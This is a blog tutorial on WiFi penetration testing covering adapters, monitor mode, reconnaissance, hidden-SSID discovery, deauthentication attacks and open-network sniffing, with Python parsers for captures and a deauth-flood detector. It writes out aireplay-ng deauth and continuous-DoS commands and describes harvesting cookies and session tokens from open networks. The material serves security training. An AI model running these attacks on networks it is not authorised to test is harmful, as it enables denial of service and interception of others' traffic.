WiFi Hacking 101: Breaking Into Wireless Networks (Part 1)
12 min read
February 1, 2026

👋 Introduction
Hey everyone!
Last week I spent two days in a WiFi security course taught by @OscarAkaElvis (creator of airgeddon). Hands-on training, proper hardware, and an instructor who actually knew his stuff. I learned more about 802.11 exploitation in those two days than I had in years of reading blog posts and documentation.
Here’s what surprised me most. WiFi hacking isn’t some black magic reserved for elite hackers. The fundamentals are straightforward. The tools are mature and well-documented. The attack vectors are proven and reproducible. What was hard ten years ago is now point-and-click with the right hardware and tools.
But there’s a catch. Nobody teaches this systematically. You find scattered blog posts about deauth attacks. YouTube videos showing WPA cracking without explaining why it works. Tools documentation that assumes you already understand 802.11 fundamentals.
That’s why I’m writing this. I want to share what I learned in a way that actually makes sense. Start with why WiFi is such a massive attack surface. Cover the fundamentals you need to understand the attacks. Explain the hardware requirements. Show you how to set up your testing environment properly. Then walk through the attack techniques step by step.
This is Part 1, covering fundamentals, hardware, setup, and basic attacks. The advanced stuff (WPA/WPA2 cracking, PMKID attacks, WPS exploitation, WPA3, and enterprise networks) comes next.
If you’ve ever wanted to understand WiFi hacking but found it overwhelming, this is your starting point.
Let’s break some WiFi 👇
📡 Why WiFi Security Matters
Wireless networks are everywhere, broadcasting constantly to anyone within range. Unlike wired networks requiring physical access, WiFi extends beyond walls. Park outside an office building and you can see dozens of potential entry points.
The security models are fundamentally flawed. WEP was broken in 2001. WPA2 (still the most common standard) has been compromised via KRACK attacks, PMKID extraction, and implementation bugs. Even WPA3 suffered from Dragonblood attacks within a year of release.
Organizations treat WiFi as an afterthought. Default passwords on access points. WPS enabled. Weak PSKs. No client isolation. Meanwhile, they invest heavily in firewalls and IDS/IPS while the wireless network sits misconfigured since initial setup.
The attack vectors are practical. Capture a WPA2 handshake and crack it offline. No rate limiting. No account lockouts. Just your GPU and a wordlist. The barrier to entry is low: a $20-50 adapter, free open-source tools, and well-documented techniques.
This is why every pentester needs to understand WiFi security. It’s often the easiest way into a network.
🔧 Essential Hardware
You can’t hack WiFi with any random adapter. Your laptop’s built-in WiFi card probably won’t cut it. You need hardware that supports monitor mode and packet injection.
Monitor mode lets your adapter capture all wireless traffic in range, not just traffic directed to your MAC address. This is how you see handshakes, deauth frames, beacon frames, everything happening on the network.
Packet injection lets you send arbitrary 802.11 frames. This is critical for deauth attacks, ARP replay attacks, and many other techniques. Without injection capability, you’re severely limited in what attacks you can perform.
Recommended Adapters
ALFA AWUS036ACH ($40-50) - Industry standard. Realtek RTL8812AU chipset, dual-band 2.4/5GHz, excellent range. Monitor mode and injection work well, but the chipset needs an out-of-tree driver (see Driver Installation below), so it is not plug-and-play on every distro. This is what you’ll see in every WiFi security course.
ALFA AWUS036ACM ($45-55) - Better for advanced attacks. MediaTek MT7612U chipset with superior injection performance. Get this if you’re serious about WiFi testing.
TP-Link TL-WN722N v1 ($20-30) - Budget option. Atheros AR9271, single-band 2.4GHz only. Critical: only v1.x works, v2/v3 don’t support injection.
Panda PAU09 N600 ($30-40) - Ralink RT5572, reliable dual-band alternative.
Key Considerations
Chipset matters more than brand. Avoid Broadcom (poor Linux support), Realtek RTL8188EU (no injection support in the mainline driver), and Intel (monitor mode often works, but injection generally isn’t supported by the driver/firmware).
External antennas extend range dramatically. Standard adapters work for close-range testing within 10-50 meters. Need to test from farther away? Get an adapter with RP-SMA connector and add a directional antenna. Suddenly you’re pulling networks from 300+ meters away.
Driver Installation
# Note: out-of-tree drivers break after kernel updates unless installed via DKMS
# For RTL8812AU (ALFA AWUS036ACH)
git clone https://github.com/aircrack-ng/rtl8812au.git
cd rtl8812au
make
sudo make install
# Or, so it is rebuilt automatically on every kernel update:
sudo make dkms_install
# On Kali the same driver ships as a package:
sudo apt install realtek-rtl88xxau-dkms
# For MT7612U (ALFA AWUS036ACM)
# Uses the in-kernel mt76x2u driver, so there is nothing to clone. Check it loaded:
lsmod | grep mt76x2u
# If it didn't, load it and check the kernel log
sudo modprobe mt76x2u
dmesg | grep -i mt76
# Verify your adapter is recognized
iw dev
# (iwconfig still works but is deprecated)
# You should see your wireless interface (usually wlan0, wlan1, wlx...)
📻 WiFi Fundamentals
You need to understand the basics of how WiFi works before you can break it. This isn’t theory for the sake of theory. These concepts directly relate to exploitation.
Bands and Channels
WiFi operates on two main frequency bands. The 2.4 GHz band uses channels 1-13 (US uses 1-11). Channel centres are only 5 MHz apart, but each channel is 20 MHz wide (22 MHz for 802.11b), so adjacent channels overlap; only 1, 6 and 11 are far enough apart not to. You get better range but worse speed. It’s more crowded because everyone uses 2.4 GHz, and legacy devices only support this band.
The 5 GHz band has many more channels (36, 40, 44, 48, and up). It’s less crowded with better throughput, but shorter range and less wall penetration. Modern high-speed networks require 5 GHz.
Why this matters for attacks: you need to target the right band and channel. Your adapter must support the band the target network uses. Most home networks are still 2.4 GHz. Enterprise networks often use both.
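To see where the “only 1, 6 and 11” rule comes from, here is a short added example (mine, not from the original post) that converts channel numbers to centre frequencies and picks sets of channels that don’t overlap. The channel plan is the standard 802.11 one; the two widths compared (22 MHz for 802.11b, 20 MHz for 802.11g/n) are the only assumptions.

```python
# Added example (not from the original post): map 802.11 channel numbers to
# centre frequencies and work out which channels really don't overlap.
# Frequencies follow the 802.11 channel plan; the widths are assumptions for
# the two cases compared (22 MHz for 802.11b, 20 MHz for 802.11g/n).

def channel_to_freq(channel: int) -> int:
    """Centre frequency in MHz for a 2.4 GHz or 5 GHz channel number."""
    if 1 <= channel <= 13:
        return 2407 + 5 * channel      # 2.4 GHz: 5 MHz spacing, ch 1 = 2412
    if channel == 14:
        return 2484                    # Japan-only 802.11b channel
    if 32 <= channel <= 177:
        return 5000 + 5 * channel      # 5 GHz: 5 MHz spacing, ch 36 = 5180
    raise ValueError(f"unknown channel {channel}")

def channels_overlap(a: int, b: int, width_mhz: int) -> bool:
    """Two channels of equal width overlap when their centres are closer than one width."""
    return abs(channel_to_freq(a) - channel_to_freq(b)) < width_mhz

def non_overlapping(channels, width_mhz: int = 20) -> list:
    """Greedy selection, lowest first, of channels that don't overlap each other."""
    chosen = []
    for ch in sorted(channels):
        if not any(channels_overlap(ch, c, width_mhz) for c in chosen):
            chosen.append(ch)
    return chosen

if __name__ == "__main__":
    # 802.11b's 22 MHz channels give the classic 1/6/11 plan in the US 11-channel band...
    print(non_overlapping(range(1, 12), width_mhz=22))   # [1, 6, 11]
    # ...while pure 20 MHz OFDM channels fit four into the 13-channel band
    print(non_overlapping(range(1, 14), width_mhz=20))   # [1, 5, 9, 13]
    # 5 GHz channels are spaced 20 MHz apart by design, so 36/40/44/48 never overlap
    print(non_overlapping([36, 40, 44, 48]))             # [36, 40, 44, 48]
```

The practical point: when you lock airodump-ng to a channel, neighbouring channels still bleed into your capture, and a target on channel 3 is audible from channels 1 and 6.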
Operating Modes
WiFi adapters operate in different modes. Managed mode is the default: a normal client that associates with an access point like any other device. Monitor mode is the 802.11 analogue of promiscuous mode, but stronger: the adapter doesn’t need to be associated with anything, and it hands you raw 802.11 frames on the current channel (management, control and data) regardless of destination MAC address. This is what packet capture and analysis rely on. Master (AP) mode makes your adapter act as an access point, used for Evil Twin attacks. Ad-hoc mode enables direct device-to-device communication without an access point.
Virtual Interfaces (VIF)
Modern drivers support multiple virtual interfaces on one physical adapter. You can run monitor mode while staying connected to a network.
# Create a second, monitor-mode interface on the same radio and bring it up
sudo iw dev wlan0 interface add mon0 type monitor
sudo ip link set mon0 up
# wlan0 stays in managed mode, mon0 captures traffic
Note: VIF support varies by driver, and both interfaces share one radio, so mon0 is tied to the channel wlan0 is connected on (no channel hopping while associated). If you hit issues, use single-interface mode.
Authentication and Encryption
Open (OPN): No auth, no encryption. Traffic in plaintext. Common in public spaces.
WEP: Deprecated in 2004, completely broken. Crackable in minutes.
WPA/WPA2-PSK: Standard for home/small business. Security depends on passphrase strength.
WPA2-Enterprise (802.1X): RADIUS authentication, individual credentials. Common in corporate environments.
WPA3: Latest standard with a new key exchange (SAE, a password-authenticated key exchange), forward secrecy, and resistance to offline dictionary attacks on captured traffic. It requires Management Frame Protection. Adoption is still low, and early implementations were vulnerable to the Dragonblood side-channel and downgrade attacks.
🎯 Setting Up Your Testing Environment
You’ve got your hardware. Time to configure your environment properly.
Enable Monitor Mode
# Kill processes that might interfere (this stops NetworkManager and wpa_supplicant)
sudo airmon-ng check kill
# Enable monitor mode on your interface
sudo airmon-ng start wlan0
# This creates a monitor interface (usually wlan0mon)
# Verify it's in monitor mode
iwconfig
# or: iw dev wlan0mon info   (look for "type monitor")
# When you're done: sudo airmon-ng stop wlan0mon && sudo systemctl start NetworkManager
Test Packet Injection
Packet injection is critical. Test it before attempting attacks.
# Install aireplay-ng (part of aircrack-ng suite)
sudo apt install aircrack-ng
# Test injection on your monitor interface
sudo aireplay-ng --test wlan0mon
# Successful output looks like:
# Injection is working!
# Found X APs
If injection fails:
- Check driver installation
- Verify chipset supports injection
- Try a different USB port (USB 2.0 vs 3.0 can matter)
- Check dmesg for errors:
dmesg | tail -50
Channel Hopping
Monitor mode captures traffic on one channel at a time. To see all networks, you need to hop between channels.
# Hop through the 2.4 GHz channels (the default)
sudo airodump-ng wlan0mon
# Include 5 GHz as well (a = 5 GHz, bg = 2.4 GHz); needs a dual-band adapter
sudo airodump-ng --band abg wlan0mon
# Hop only on specific channels (1, 6, 11 - the non-overlapping ones)
sudo airodump-ng --channel 1,6,11 wlan0mon
# Lock to a specific channel (important when capturing handshakes)
sudo airodump-ng --channel 6 wlan0mon
Organize Your Captures
Create a dedicated directory structure for your captures:
mkdir -p ~/wifi-testing/{captures,wordlists,handshakes,results}
# When capturing, save to organized directories
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w ~/wifi-testing/captures/target_network wlan0mon
🔍 Reconnaissance and Network Discovery
Now that your adapter is in monitor mode, time to see what networks are around you.
Basic Network Discovery
# Scan all networks in range
sudo airodump-ng wlan0mon
Key fields:
- BSSID: AP MAC address
- PWR: Signal strength in dBm (negative; closer to 0 = stronger, so -40 beats -80)
- CH: Channel
- ENC: Encryption (OPN, WEP, WPA, WPA2, WPA3)
- CIPHER: Cipher in use (CCMP, TKIP, WEP)
- AUTH: Key management (PSK, MGT for 802.1X/enterprise, SAE for WPA3, OWE)
- ESSID: Network name
Bottom section shows connected clients and their probe requests (networks they’re looking for).
Focus on a Target Network
Once you identify a target, focus your capture on that network:
# Lock to the target's channel and BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# -c 6: Lock to channel 6
# --bssid: Target network's MAC address
# -w capture: Save to capture-01.cap, capture-01.csv, etc.
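The .csv that `-w` writes next to the .cap is the easiest thing to post-process. The following is an added example (mine, not from the original post) that parses it and pulls out what a recon pass cares about: weakly configured APs, hidden networks, and the names clients are probing for. The sample CSV is constructed for the example and follows airodump-ng’s column layout (AP table, blank line, station table); the MACs and network names are made up.

```python
# Added example (not from the original post): parse the CSV that
# `airodump-ng -w <prefix>` writes alongside the .cap and pull out what a recon
# pass cares about: weakly configured APs, hidden networks, and the ESSIDs
# clients are probing for. The sample below is constructed for this example and
# follows airodump-ng's CSV column layout (AP table, blank line, station table);
# the MACs and names are made up.
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2026-02-01 10:00:00, 2026-02-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -45,  120,  0,   0.  0.  0.  0,   7, HomeNet,
AA:BB:CC:DD:EE:02, 2026-02-01 10:00:01, 2026-02-01 10:05:00,  1,  54, OPN,  ,  , -62,   80,  0,   0.  0.  0.  0,  10, CoffeeShop,
AA:BB:CC:DD:EE:03, 2026-02-01 10:00:02, 2026-02-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,   30,  0,   0.  0.  0.  0,   9, ,
AA:BB:CC:DD:EE:04, 2026-02-01 10:00:03, 2026-02-01 10:05:00, 36,  54, WEP, WEP,  , -80,   10,  0,   0.  0.  0.  0,   6, OldCam,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2026-02-01 10:01:00, 2026-02-01 10:05:00, -50,   45, AA:BB:CC:DD:EE:01, HomeNet
11:22:33:44:55:77, 2026-02-01 10:02:00, 2026-02-01 10:05:00, -65,   12, (not associated), CorpWiFi,HomeNet
11:22:33:44:55:88, 2026-02-01 10:03:00, 2026-02-01 10:05:00, -58,    3, AA:BB:CC:DD:EE:03, SecretLab
"""

AP_FIELDS = ["bssid", "first_seen", "last_seen", "channel", "speed", "privacy", "cipher",
             "auth", "power", "beacons", "ivs", "lan_ip", "id_length", "essid", "key"]
STA_FIELDS = ["station", "first_seen", "last_seen", "power", "packets", "bssid"]

def parse_airodump_csv(text: str):
    """Return (aps, stations). The 'Probed ESSIDs' column is itself comma-separated,
    so everything after the station's BSSID is treated as probed names."""
    aps, stations, section = [], [], "ap"
    for row in csv.reader(io.StringIO(text)):
        row = [field.strip() for field in row]
        if not any(row):
            continue
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "sta"
            continue
        if section == "ap":
            ap = dict(zip(AP_FIELDS, row))
            for key in ("channel", "power", "id_length"):
                ap[key] = int(ap[key])
            # hidden networks have an empty ESSID but a non-zero advertised length
            ap["hidden"] = ap["essid"] == "" and ap["id_length"] > 0
            aps.append(ap)
        else:
            sta = dict(zip(STA_FIELDS, row[:6]))
            sta["probed"] = [name for name in row[6:] if name]
            stations.append(sta)
    return aps, stations

def weak_aps(aps) -> list:
    """APs with no encryption, WEP, or WPA1/TKIP: no handshake cracking needed,
    or only trivial effort."""
    weak = []
    for ap in aps:
        if ap["privacy"] in ("OPN", "WEP", "WPA") or "TKIP" in ap["cipher"]:
            label = ap["essid"] or f"<length: {ap['id_length']}>"
            weak.append((ap["bssid"], label, ap["privacy"]))
    return weak

def probed_essids(stations) -> dict:
    """ESSID -> clients asking for it. Unassociated stations leaking the names of
    other networks they know are the interesting ones."""
    wanted = {}
    for sta in stations:
        for name in sta["probed"]:
            wanted.setdefault(name, []).append(sta["station"])
    return wanted

def reveal_hidden(aps, stations) -> dict:
    """Heuristic: a client associated to a hidden AP that probed for a name of
    exactly the advertised length has almost certainly told you the SSID."""
    revealed = {}
    for ap in aps:
        if not ap["hidden"]:
            continue
        for sta in stations:
            if sta["bssid"] != ap["bssid"]:
                continue
            for name in sta["probed"]:
                if len(name) == ap["id_length"]:
                    revealed[ap["bssid"]] = name
    return revealed

if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    print(weak_aps(aps))                  # [('AA:BB:CC:DD:EE:02', 'CoffeeShop', 'OPN'), ('AA:BB:CC:DD:EE:04', 'OldCam', 'WEP')]
    print(probed_essids(stations))
    print(reveal_hidden(aps, stations))   # {'AA:BB:CC:DD:EE:03': 'SecretLab'}
```

Point it at your own `capture-01.csv` by reading the file instead of `SAMPLE_CSV`. The probed-ESSID map is the same information as the bottom of the airodump-ng screen, but as data you can diff between two sessions or feed into a target list.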
Identify Hidden Networks
Some networks hide their SSID (don’t broadcast the network name in beacons). They show up as <length: X> in airodump-ng.
How to reveal hidden SSIDs:
Hiding only removes the name from beacons. It is still sent in the clear in the client’s directed probe requests, in the AP’s probe responses, and in the association request. airodump-ng fills in the ESSID automatically as soon as it sees any of those, so lock onto the AP’s channel and wait for a client to connect:
# Wait for a client to (re)join; the <length: X> entry turns into the real name
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF wlan0mon
# Or force a connected client to reconnect (deauth attack - covered next)
# The client re-associates and sends the SSID again
💥 Basic Attack Techniques
Let’s start with the fundamental attacks every WiFi pentester needs to know.
Deauthentication Attacks
Deauth attacks disconnect clients from a network. They’re one of the most versatile WiFi attack primitives.
How it works: deauthentication is a management frame, and in plain WPA/WPA2 management frames carry no authentication (unless 802.11w Management Frame Protection is negotiated, see below). Anyone who knows the AP’s BSSID and the client’s MAC can forge them. Send deauth frames claiming to be from the access point, and the client tears down its association.
Perform a deauth attack (your monitor interface must be on the target’s channel, so keep airodump-ng locked to it in another terminal):
# Deauth all clients from a network
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# --deauth 10: Send 10 deauth frames (-0 10 is the short form)
# -a: Target access point BSSID
# Deauth a specific client
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# -c: Target client MAC address (more reliable than broadcast deauth)
What you’ll see:
Clients disconnect. They usually reconnect within seconds. If you’re running airodump-ng, you’ll see the “WPA handshake” message when the client reconnects. This handshake is what you need for WPA/WPA2 cracking (covered in Part 2).
Continuous deauth (DoS):
# Send deauth frames continuously (0 = infinite)
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon
# Stop with Ctrl+C
Management Frame Protection (MFP)
WPA3 requires 802.11w Management Frame Protection (PMF), and WPA2 networks can enable it optionally. PMF authenticates deauthentication and disassociation frames, so spoofed ones are dropped by clients that negotiated it.
How to detect MFP:
# Parse beacon or probe response frames with Wireshark and look at the RSN
# Information Element: the RSN Capabilities field carries the MFP Capable and
# MFP Required bits
wlan.rsn.capabilities.mfpr == 1   # APs that require PMF
wlan.rsn.capabilities.mfpc == 1   # APs that merely support it
If MFP is required: deauth attacks won’t work, because every client on that AP drops unprotected deauth frames. You can still get a handshake passively by waiting for clients to reconnect on their own. If MFP is only optional (capable but not required), clients that didn’t negotiate it remain vulnerable. WPA3 mandates PMF, so adoption is rising, but most WPA2 networks still don’t enable it.
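The RSN element is small enough to decode by hand, and doing so tells you in one pass what airodump-ng shows as ENC/CIPHER/AUTH plus the PMF status above. The following is an added example (mine, not from the original post or the aircrack-ng project): a parser for the RSN information element (element ID 48) and a classifier that labels the network and says whether unprotected deauth frames will be honoured. The element bytes are constructed for the example; the suite and capability-bit numbers are the ones defined in 802.11.

```python
# Added example (not from the original post): decode the RSN information element
# (element ID 48) from a beacon or probe response to read off what airodump-ng
# shows as ENC/CIPHER/AUTH and, from the RSN Capabilities bits, whether
# Management Frame Protection is disabled, optional or required. The element
# bytes below are constructed for the example. WPA1 advertises itself in a
# vendor-specific element (OUI 00:50:F2) instead, which this parser does not cover.
import struct

RSN_ELEMENT_ID = 48
IEEE_OUI = b"\x00\x0f\xac"
CIPHER_SUITES = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104",
                 8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
AKM_SUITES = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK", 5: "802.1X-SHA256",
              6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE", 18: "OWE"}
MFPR, MFPC = 0x0040, 0x0080          # RSN Capabilities bits 6 and 7

def _suite_name(buf: bytes, off: int, table: dict) -> str:
    oui, kind = buf[off:off + 3], buf[off + 3]
    if oui != IEEE_OUI:
        return f"vendor-{oui.hex()}-{kind}"
    return table.get(kind, f"type-{kind}")

def _suite_list(buf: bytes, off: int, table: dict):
    count = struct.unpack_from("<H", buf, off)[0]
    off += 2
    names = [_suite_name(buf, off + 4 * i, table) for i in range(count)]
    return names, off + 4 * count

def parse_rsn_ie(element: bytes) -> dict:
    """Parse an RSN element as it appears on the air: ID, length, then the body."""
    if element[0] != RSN_ELEMENT_ID:
        raise ValueError("not an RSN information element")
    body = element[2:2 + element[1]]
    version = struct.unpack_from("<H", body, 0)[0]
    if version != 1:
        raise ValueError(f"unsupported RSN version {version}")
    group = _suite_name(body, 2, CIPHER_SUITES)
    pairwise, off = _suite_list(body, 6, CIPHER_SUITES)
    akms, off = _suite_list(body, off, AKM_SUITES)
    # RSN Capabilities is optional; old APs omit it, which means no PMF at all
    caps = struct.unpack_from("<H", body, off)[0] if off + 2 <= len(body) else 0
    if caps & MFPR:
        mfp = "required"
    elif caps & MFPC:
        mfp = "optional"
    else:
        mfp = "disabled"
    return {"group_cipher": group, "pairwise_ciphers": pairwise, "akm": akms, "mfp": mfp}

def describe_network(rsn: dict) -> dict:
    """Turn the parsed element into the labels a tester cares about."""
    akm = set(rsn["akm"])
    if akm & {"SAE", "FT-SAE"}:
        mode = "WPA3 transition (SAE + PSK)" if akm & {"PSK", "PSK-SHA256"} else "WPA3-SAE"
    elif "OWE" in akm:
        mode = "OWE"
    elif akm & {"802.1X", "FT-802.1X", "802.1X-SHA256"}:
        mode = "WPA2-Enterprise (802.1X)"
    elif akm & {"PSK", "FT-PSK", "PSK-SHA256"}:
        mode = "WPA2-PSK"
    else:
        mode = "unknown"
    return {"mode": mode, "mfp": rsn["mfp"],
            # unprotected deauth only fails against clients that negotiated PMF,
            # which is guaranteed only when the AP requires it
            "deauth_spoofable": rsn["mfp"] != "required",
            "weak_cipher": any(c in ("TKIP", "WEP-40", "WEP-104")
                               for c in [rsn["group_cipher"], *rsn["pairwise_ciphers"]])}

# Constructed elements (bytes.fromhex ignores the spaces):
WPA2_PSK_NO_CAPS = bytes.fromhex("30 12 0100 000fac04 0100 000fac04 0100 000fac02")
WPA2_PSK_PMF_OPTIONAL = bytes.fromhex("30 14 0100 000fac04 0100 000fac04 0100 000fac02 8000")
WPA2_ENT_MIXED = bytes.fromhex("30 18 0100 000fac02 0200 000fac04 000fac02 0100 000fac01 0000")
WPA3_SAE = bytes.fromhex("30 14 0100 000fac04 0100 000fac04 0100 000fac08 c000")
WPA3_TRANSITION = bytes.fromhex("30 18 0100 000fac04 0100 000fac04 0200 000fac02 000fac08 8000")

if __name__ == "__main__":
    for name, elem in [("no caps", WPA2_PSK_NO_CAPS), ("pmf optional", WPA2_PSK_PMF_OPTIONAL),
                       ("enterprise", WPA2_ENT_MIXED), ("wpa3", WPA3_SAE), ("transition", WPA3_TRANSITION)]:
        print(name, describe_network(parse_rsn_ie(elem)))
```

The transition-mode case is worth noting: an AP that advertises both SAE and PSK with PMF only optional is exactly the configuration where a WPA2-capable client can still be deauthenticated and its handshake captured, even though the SSID “supports WPA3”.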
Open Network Exploitation
Open networks (OPN) have no encryption. All traffic is plaintext. This is the easiest target.
Connect to open networks:
# Stop monitor mode and bring NetworkManager back (airmon-ng check kill stopped it)
sudo airmon-ng stop wlan0mon
sudo systemctl start NetworkManager
# Connect to the open network
sudo nmcli dev wifi connect "Network_Name"
Capture and analyze traffic:
# Capture in monitor mode
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w open_network wlan0mon
# Analyze with Wireshark
wireshark open_network-01.cap
You’ll see HTTP requests, cookies, session tokens, DNS queries, and unencrypted protocols. While most sites use HTTPS, you’ll still find plaintext traffic from legacy HTTP sites, poorly-coded mobile apps, IoT devices, and printers.
OWE (Opportunistic Wireless Encryption)
OWE is the modern replacement for open networks. Provides encryption without authentication. Protects against passive eavesdropping while keeping the “no password required” convenience.
How to identify OWE networks:
# Look for "OWE" in the AUTH column of airodump-ng
sudo airodump-ng wlan0mon
OWE networks appear open but encrypt traffic. You can’t simply capture plaintext traffic. However, OWE doesn’t prevent Evil Twin attacks (covered in Part 2).
Traffic Interception with Wireshark
Captured packets need analysis. Wireshark is your tool.
Open captures:
# Launch Wireshark
wireshark capture-01.cap
Key Wireshark filters:
eapol # WPA handshakes
wlan.fc.type_subtype == 0x0c # Deauth frames
wlan.fc.type_subtype == 0x04 # Probe requests
wlan.addr == aa:bb:cc:dd:ee:ff # Filter by BSSID
Export objects via File -> Export Objects -> HTTP to extract transferred files.
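Those filters are just tests on the frame-control byte and a few fixed offsets, which is easy to reproduce in code when you want to run checks over a capture without clicking through Wireshark. The following is an added example (mine, not from the original post): a minimal 802.11 frame parser that classifies frames the way `wlan.fc.type_subtype` and `eapol` do, then runs two checks from earlier sections over a capture: flagging a deauth flood by its claimed sender, and recovering a hidden SSID from a directed probe request, as described under “Identify Hidden Networks”. The frames are constructed inline (no radiotap header, as in a pcap with link type 105), the MACs are made up, and reason code 7 is used because that is aireplay-ng’s default.

```python
# Added example (not from the original post): a minimal parser for raw 802.11
# frames that does offline what the Wireshark filters above do, then runs two
# checks over a capture: deauth-flood detection and hidden-SSID recovery.
# All frames below are constructed for the example (no radiotap header, as in
# a pcap with link type 105); the MACs are made up.
import struct
from collections import Counter

MGMT, DATA = 0, 2
KINDS = {0x04: "probe-req", 0x05: "probe-resp", 0x08: "beacon",
         0x0a: "disassoc", 0x0c: "deauth", 0x20: "data", 0x28: "qos-data"}
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")  # LLC/SNAP header, ethertype 0x888e
BROADCAST = b"\xff" * 6

def mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def ie(element_id: int, payload: bytes) -> bytes:
    """One information element: ID, length, payload."""
    return bytes([element_id, len(payload)]) + payload

def build_frame(ftype, subtype, addr1, addr2, addr3, body, flags=0, seq=0):
    """802.11 MAC header (frame control, duration, 3 addresses, sequence control) + body."""
    fc = bytes([(ftype << 2) | (subtype << 4), flags])
    return fc + struct.pack("<H", 0) + addr1 + addr2 + addr3 + struct.pack("<H", seq << 4) + body

def parse_frame(raw: bytes) -> dict:
    ftype, subtype = (raw[0] >> 2) & 0x3, raw[0] >> 4
    code = (ftype << 4) | subtype              # the value Wireshark's wlan.fc.type_subtype shows
    info = {"type_subtype": code, "kind": KINDS.get(code, "other"),
            "addr1": mac(raw[4:10]), "addr2": mac(raw[10:16]), "addr3": mac(raw[16:22]),
            "ssid": None, "ssid_len": None, "reason": None, "eapol": False}
    body = raw[24:]
    if ftype == MGMT:
        if subtype in (0x05, 0x08):            # probe response / beacon: skip timestamp, interval, capabilities
            body = body[12:]
        if subtype in (0x0a, 0x0c):            # disassoc / deauth: the body is just a reason code
            info["reason"] = struct.unpack("<H", body[:2])[0]
        if subtype in (0x04, 0x05, 0x08):      # walk the IEs looking for the SSID element (ID 0)
            off = 0
            while off + 2 <= len(body):
                eid, ln = body[off], body[off + 1]
                if eid == 0:
                    val = body[off + 2:off + 2 + ln]
                    info["ssid_len"] = ln
                    # a hidden network sends an empty or zero-filled SSID
                    info["ssid"] = val.decode("utf-8", "replace") if val.strip(b"\x00") else None
                    break
                off += 2 + ln
    elif ftype == DATA:
        if subtype & 0x08:                     # QoS data carries a 2-byte QoS control field first
            body = body[2:]
        info["eapol"] = body[:8] == LLC_SNAP_EAPOL   # what the `eapol` display filter matches
    return info

def deauth_flood_sources(frames, threshold=5) -> dict:
    """Senders (addr2, i.e. the claimed AP) of at least `threshold` deauth/disassoc frames."""
    counts = Counter(f["addr2"] for f in frames if f["kind"] in ("deauth", "disassoc"))
    return {src: n for src, n in counts.items() if n >= threshold}

def reveal_hidden_ssids(frames) -> dict:
    """Match beacons with a blank SSID to directed probe requests (addr3 = BSSID) or
    probe responses (addr2 = BSSID) that carry the name, checking the length matches."""
    hidden = {f["addr2"]: f["ssid_len"] for f in frames if f["kind"] == "beacon" and f["ssid"] is None}
    revealed = {}
    for f in frames:
        if f["ssid"] is None:
            continue
        bssid = f["addr2"] if f["kind"] == "probe-resp" else f["addr3"]
        if bssid in hidden and hidden[bssid] in (0, f["ssid_len"]):
            revealed[bssid] = f["ssid"]
    return revealed

def count_eapol(frames) -> int:
    return sum(1 for f in frames if f["eapol"])

# Constructed capture: a hidden-SSID beacon, a directed probe request, ten
# spoofed deauths (reason code 7, aireplay-ng's default) and one EAPOL-Key frame.
AP, CLIENT = bytes.fromhex("aabbccddeeff"), bytes.fromhex("112233445566")
RATES = ie(1, bytes.fromhex("82848b96"))
CAPTURE = [
    build_frame(MGMT, 0x08, BROADCAST, AP, AP,
                bytes(8) + struct.pack("<HH", 100, 0x0411) + ie(0, bytes(9)) + RATES),
    build_frame(MGMT, 0x04, AP, CLIENT, AP, ie(0, b"SecretLab") + RATES),
    *[build_frame(MGMT, 0x0c, CLIENT, AP, AP, struct.pack("<H", 7), seq=i) for i in range(10)],
    build_frame(DATA, 0x08, CLIENT, AP, AP,                    # flags 0x02 = FromDS
                bytes(2) + LLC_SNAP_EAPOL + bytes([2, 3]) + struct.pack(">H", 95) + bytes(95), flags=0x02),
]

if __name__ == "__main__":
    frames = [parse_frame(f) for f in CAPTURE]
    print(deauth_flood_sources(frames))   # {'aa:bb:cc:dd:ee:ff': 10}
    print(reveal_hidden_ssids(frames))    # {'aa:bb:cc:dd:ee:ff': 'SecretLab'}
    print(count_eapol(frames))            # 1
```

To run it over a real capture, read the frames out of a link-type 105 pcap (or strip the radiotap header first, whose length is in its bytes 2-3) and feed them to `parse_frame`. The deauth counter is the same logic a wireless IDS uses to flag the attack from the previous section: tens of deauths per second from one BSSID, all with the same reason code, is not what a real AP does.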
🎯 Key Takeaways
Hardware matters. Get an adapter that supports monitor mode and packet injection. The ALFA AWUS036ACH is the industry standard. Don’t waste time fighting with unsupported hardware.
Understanding the fundamentals (bands, channels, operating modes, authentication methods) directly informs your attack strategy. These aren’t academic concepts.
Deauth attacks are your Swiss Army knife. They force handshake captures, test DoS resilience, and prepare for Evil Twin attacks. They still work on most WPA2 networks because few of them enable Management Frame Protection.
Monitor mode and packet injection are non-negotiable. Test injection before attempting attacks. If it doesn’t work, troubleshoot your drivers and hardware immediately.
Wireshark is essential. Captured packets tell the whole story through EAPOL frames, probe requests, and beacon frames. Learn the filters.
That’s it for Part 1!
WiFi security testing is more accessible than ever. The hardware is affordable. The software is free and well-maintained. The techniques are proven and reproducible. What separates successful WiFi pentesters from unsuccessful ones is understanding the fundamentals and knowing how to use the tools effectively.
Practice on your own networks first. Set up a test access point. Capture your own handshakes. Perform deauth attacks against your own devices. Understand what works and what doesn’t before attempting client assessments.
